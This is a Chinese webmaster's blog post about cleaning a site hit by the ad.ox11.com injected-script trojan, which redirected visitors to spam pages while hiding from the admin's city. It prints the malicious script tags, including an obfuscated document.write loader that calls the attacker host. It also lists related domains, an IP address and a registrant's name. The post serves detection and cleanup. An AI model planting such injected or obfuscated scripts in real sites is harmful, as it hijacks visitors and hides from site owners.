网站中了ad.ox11.com木马的解决方法
今天我无意间打开公司的一个网站,打开网站几秒很正常,突然跳转到一个私服的网站,心想:不会被黑了吧!立刻通过远程进入服务器,进入网站目录检查一些基本的文件,发现都没有问题,不说其他的,为了节省时间,马上下载个知名的安全狗查杀下,扫了几分钟,没有结果,心想:不会吧,这么牛?安全狗的特征码可是很强大的,都无法查杀;看来遇到特殊的代码了。再来个青云木马清理专家,这个工具也是很强大的,不过很少人知道,在这说算是帮他宣传下吧,好用的东西当然要分享给大家的。
打开青云木马清理专家扫了一遍,结果还是没有找到,一直让我感到很郁闷,这么强大??用了工具看来都是没有什么希望了,唯有手动来查杀,怎么说工具都是死的,都是通过开发者的指定的特征码来查杀。
我从首页开始,追踪代码文件,通过文件修改的时间,发现一个js文件异常,打开看了看,好像很正常,如果你一行行看下去的时候,你会发现多了一段奇怪的代码如图:
< script src=http://ad.ox11.com/ip.asp?zhejiang|jiaxing ></script >
没有错,这就是我们要找的,删除这段代码重新访问网站,一切恢复了正常!手动的工作量很大的,一定要有耐心。
这里我介绍手工清理挂马的基本知识:
1.判断网站是否异常;
2.分析挂马类型(挂马指向的地址);
3.追踪代码(工具扫出来的就不用那么麻烦了);
4.找到挂马文件先备份源文件在清理(预防错误操作,备份了可以还原)。
特殊挂马代码如下:ad.ox11.com/?action=pop 挂马转跳垃圾
网站中了ad.ox11.com木马的解决方法
网站中了此木马的解决方法:此木马弹窗可以自动或人为检测到管理员所在城市,从而不让掉管理员所在城市的IP弹窗,所有管理员很难发现。
中国网页设计被人挂木马了,都不知道挂了多长时间,可能几个月,也可能已经几年……
这个不要脸的家伙把我常用地区的IP过滤了,在这些地区打开网页正常,在其他地区就会自动跳转到这个黑客的广告页面。
于是网上搜了一下,结果发现被同一个人,同样的挂马手段黑了很多站长的网站。
百度一下ad.ox11.com有太多了!
网站中了此木马的解决方法:
此木马弹窗可以自动或人为检测到管理员所在城市,从而不让掉管理员所在城市的IP弹窗,所有管理员很难发现。经过大量调查发现,终于将这个让众多站长深恶痛绝的垃圾搞清楚了。???
挂马代码,一般在js文件,或者HTML文件里。
代码
<\script src='http://\ad.\zom123.net/ip.asp?loc=dalian'><\/script >
代码 < script src=http://ad.ox11.com/ip.asp?loc=beijing|qingdao></script >
我站的代码为:
document.write("<\s"+"cript src='http://\a"+"d.o"+"x11"+".\c"+"om/i"+"p.asp?l"+"oc=yantai|zhengzhou'><\/s"+"cript>");
如果网站被挂了这种木马,后果非常严重,几万个IP的网站,日PV几十万,由于挂了这种马被搜索引擎K的只收录2页,或直接清除,管理员很难察觉到,在管理员所在城市是正常的。
ad.ox11.com的IP地址是 119.84.119.220 所在地区为:重庆市,共有 9 个域名解析到该IP。
1 ad.nu99.com 页面400错误
2 ad.oy66.com 页面400错误
3 ad.zom123.net 页面400错误
4 ad.ox11.com 页面400错误
5 da.nu99.com 页面400错误
6 wwww.oy66.com 无标题
7 wwww.nu99.com 页面400错误
8 ad.iz55.com 页面400错误
9 ad.df77.com 页面400错误
ad.ox11.com
主办单位名称 雷颖帆
主办单位性质 个人
网站备案/许可证号 蜀ICP备12014965号-2
网站名称 伤感网
网站首页网址 www.ox11.com
审核时间 2012-06-14.
该单位还备案了以下网站
蜀ICP备12014965号-1 伤感网 www.iz55.com 2012-06-14